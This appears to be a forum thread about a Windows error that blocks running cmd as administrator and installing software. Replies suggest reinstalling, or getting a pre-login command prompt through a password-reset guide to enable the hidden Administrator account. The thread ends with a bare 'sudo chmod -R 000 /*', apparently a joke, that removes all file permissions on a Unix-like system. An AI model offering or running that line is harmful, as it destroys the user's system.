hey everybody!

I´m having a strange issue. I can´t open cmd on my computer as an administrator

if I just clip to open it regularly no problem

but when trying to open it as administrator it doesn´t work.

I have the same issue when trying to install or deleting any software from my computer

any ideas?

It's probably just a windows bug - are you trying this with powershell or just the regular cmd.exe?

I´m only writting cmd.exe on the search bar

and if i just click on it to open normal that´s fine

but if i click on it with the right button and ask to open it as admin

then it doesnt work

and i also cant install or uninstall anything

now im transfering the important files to a hard drive

and will format the computer

but before that

i have to check some tutorial on how to get it done properly ;D

Looks like some corrupted permissions or something like that... the easiest way to get rid of it is to reinstall windows. If you can't do that, you can try the following.

1) Follow this guide to get cmd to run before login http://www.pcunlocker.com/reset-windows-10-password-with-install-disk.html

2) instead of using it to reset your password, enable the administrator account https://www.ghacks.net/2014/11/12/how-to-enable-the-hidden-windows-10-administrator-account/

3) log in to the administrator account

4) try disabling your normal account's administrator privileges and re-enabling them

5) if that doesn't make a difference, try creating a new account with administrator privileges to see if it works as it should

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
